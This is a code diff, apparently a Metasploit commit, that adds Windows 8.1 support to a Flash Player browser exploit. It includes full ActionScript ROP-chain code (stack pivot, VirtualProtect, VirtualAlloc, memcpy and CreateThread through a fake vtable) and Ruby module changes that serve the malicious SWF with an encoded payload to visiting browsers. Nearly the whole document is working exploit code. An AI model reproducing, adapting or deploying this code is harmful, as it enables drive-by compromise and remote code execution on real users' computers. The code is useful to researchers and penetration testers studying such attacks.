Land support for Windows 8.1
commit
098f31c1da
Binary file not shown.
|
@ -30,12 +30,14 @@ package
|
|||
private var b64:Base64Decoder = new Base64Decoder()
|
||||
private var payload:ByteArray
|
||||
private var platform:String
|
||||
private var os:String
|
||||
private var original_length:uint = 0
|
||||
|
||||
public function Exploit()
|
||||
{
|
||||
var i:uint = 0
|
||||
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
||||
os = LoaderInfo(this.root.loaderInfo).parameters.os
|
||||
trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
|
@ -118,8 +120,9 @@ package
|
|||
return
|
||||
}
|
||||
|
||||
exploiter = new Exploiter(this, platform, payload, uv)
|
||||
exploiter = new Exploiter(this, platform, os, payload, uv)
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -11,6 +11,7 @@ package
|
|||
private var eba:ExploitByteArray
|
||||
private var payload:ByteArray
|
||||
private var platform:String
|
||||
private var op_system:String
|
||||
private var pos:uint
|
||||
private var byte_array_object:uint
|
||||
private var main:uint
|
||||
|
@ -25,11 +26,12 @@ package
|
|||
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var spray:Vector.<Object> = new Vector.<Object>(89698)
|
||||
|
||||
public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.<uint>):void
|
||||
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
|
||||
{
|
||||
exploit = exp
|
||||
payload = p
|
||||
platform = pl
|
||||
op_system = os
|
||||
|
||||
ev = new ExploitVector(uv)
|
||||
if (!ev.is_ready()) return
|
||||
|
@ -133,12 +135,19 @@ package
|
|||
private function do_rop():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop()")
|
||||
if (platform == "linux")
|
||||
if (platform == "linux") {
|
||||
do_rop_linux()
|
||||
else if (platform == "win")
|
||||
do_rop_windows()
|
||||
else
|
||||
} else if (platform == "win") {
|
||||
if (op_system == "Windows 8.1") {
|
||||
do_rop_windows8()
|
||||
} else if (op_system == "Windows 7") {
|
||||
do_rop_windows()
|
||||
} else {
|
||||
return
|
||||
}
|
||||
} else {
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
private function do_rop_windows():void
|
||||
|
@ -150,7 +159,6 @@ package
|
|||
var kernel32:uint = pe.module("kernel32.dll", winmm)
|
||||
var ntdll:uint = pe.module("ntdll.dll", kernel32)
|
||||
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
|
||||
var winexec:uint = pe.procedure("WinExec", kernel32)
|
||||
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
|
||||
var createthread:uint = pe.procedure("CreateThread", kernel32)
|
||||
var memcpy:uint = pe.procedure("memcpy", ntdll)
|
||||
|
@ -182,14 +190,14 @@ package
|
|||
|
||||
// VirtualAlloc
|
||||
eba.write(0, memcpy)
|
||||
eba.write(0, 0x70000000)
|
||||
eba.write(0, 0x7f6e0000)
|
||||
eba.write(0, 0x4000)
|
||||
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
|
||||
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
|
||||
|
||||
// memcpy
|
||||
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
|
||||
eba.write(0, 0x70000000)
|
||||
eba.write(0, 0x7f6e0000)
|
||||
eba.write(0, payload_address + 8)
|
||||
eba.write(0, payload.length)
|
||||
|
||||
|
@ -198,7 +206,7 @@ package
|
|||
eba.write(0, buffer + 0x10) // return to fix things
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0x70000000)
|
||||
eba.write(0, 0x7f6e0000)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
|
@ -207,6 +215,73 @@ package
|
|||
exploit.toString() // call method in the fake vtable
|
||||
}
|
||||
|
||||
private function do_rop_windows8():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop_windows8()")
|
||||
var pe:PE = new PE(eba)
|
||||
var flash:uint = pe.base(vtable)
|
||||
var winmm:uint = pe.module("winmm.dll", flash)
|
||||
var advapi32:uint = pe.module("advapi32.dll", flash)
|
||||
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
|
||||
var kernel32:uint = pe.module("kernel32.dll", winmm)
|
||||
var ntdll:uint = pe.module("ntdll.dll", kernel32)
|
||||
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
|
||||
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
|
||||
var createthread:uint = pe.procedure("CreateThread", kernelbase)
|
||||
var memcpy:uint = pe.procedure("memcpy", ntdll)
|
||||
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
|
||||
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
|
||||
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
|
||||
|
||||
// Continuation of execution
|
||||
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
|
||||
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
|
||||
eba.write(0, "\x89\x03", false) // mov [ebx], eax
|
||||
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
|
||||
|
||||
// Put the payload (command) in memory
|
||||
eba.write(payload_address + 8, payload, true); // payload
|
||||
|
||||
// Put the fake vtabe / stack on memory
|
||||
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
|
||||
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
|
||||
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
|
||||
eba.write(0, virtualprotect)
|
||||
|
||||
// VirtualProtect
|
||||
eba.write(0, virtualalloc)
|
||||
eba.write(0, buffer + 0x10)
|
||||
eba.write(0, 0x1000)
|
||||
eba.write(0, 0x40)
|
||||
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
|
||||
|
||||
// VirtualAlloc
|
||||
eba.write(0, memcpy)
|
||||
eba.write(0, 0x7ffd0000)
|
||||
eba.write(0, 0x4000)
|
||||
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
|
||||
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
|
||||
|
||||
// memcpy
|
||||
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
|
||||
eba.write(0, 0x7ffd0000)
|
||||
eba.write(0, payload_address + 8)
|
||||
eba.write(0, payload.length)
|
||||
|
||||
// CreateThread
|
||||
eba.write(0, createthread)
|
||||
eba.write(0, buffer + 0x10) // return to fix things
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0x7ffd0000)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
|
||||
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
|
||||
exploit.toString() // call method in the fake vtable
|
||||
}
|
||||
|
||||
private function do_rop_linux():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop_linux()")
|
||||
|
@ -241,8 +316,6 @@ package
|
|||
eba.write(0, "\x5f", false) // pop edi
|
||||
eba.write(0, "\x5e", false) // pop esi
|
||||
eba.write(0, "\xc3", false) // ret
|
||||
|
||||
// eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false)
|
||||
|
||||
// Put the popen parameters in memory
|
||||
eba.write(payload_address + 0x8, payload, true) // false
|
||||
|
|
|
@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:arch => ARCH_X86,
|
||||
:os_name => lambda do |os|
|
||||
os =~ OperatingSystems::Match::LINUX ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_7
|
||||
os =~ OperatingSystems::Match::WINDOWS_7 ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_81
|
||||
end,
|
||||
:ua_name => lambda do |ua|
|
||||
case target.name
|
||||
|
@ -116,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
os_name = target_info[:os_name]
|
||||
|
||||
if target.name =~ /Windows/
|
||||
platform_id = 'win'
|
||||
|
@ -130,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
||||
<param name="movie" value="<%=swf_random%>" />
|
||||
<param name="allowScriptAccess" value="always" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" />
|
||||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" Play="true"/>
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" Play="true"/>
|
||||
</object>
|
||||
</body>
|
||||
</html>
|
||||
|
|
Loading…
Reference in New Issue